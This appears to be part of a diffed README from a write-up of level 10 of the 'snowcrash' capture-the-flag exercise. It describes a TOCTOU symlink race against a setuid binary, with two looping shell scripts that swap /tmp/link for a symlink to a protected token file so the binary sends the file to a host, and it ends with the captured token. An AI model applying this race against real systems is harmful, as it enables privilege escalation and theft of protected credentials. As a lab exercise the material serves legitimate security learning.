Zekao/snowcrash/level10/Readme.md

     scp -P 4242 level10@192.168.56.101:/tmp/flag /mnt/nfs/homes/emaugale/Desktop

 So you have to find a way to make your file accessible to the server.

+when we use ltrace, we can see that the executable will first try to access our file, and after that, reading the content of the file.
+    -> Do a /tmp/flag file with nothing on int when it will be access, we can delete it and recreate one which will be a symlink to the token file launch our server and print the result

+        while true;
+            do
+            touch /tmp/link
+            rm -f /tmp/link
+            ln -s /home/user/level10/token /tmp/link
+            rm -f /tmp/link
+            done

+        while true;
+        do
+        /home/user/level10/level10 /tmp/link 192.168.56.101 2> /dev/null
+        done

+bash /tmp/script1.sh & bash /tmp/script2.sh

+Check flag.Here is your token : feulo4b72j7edeahuete3no7c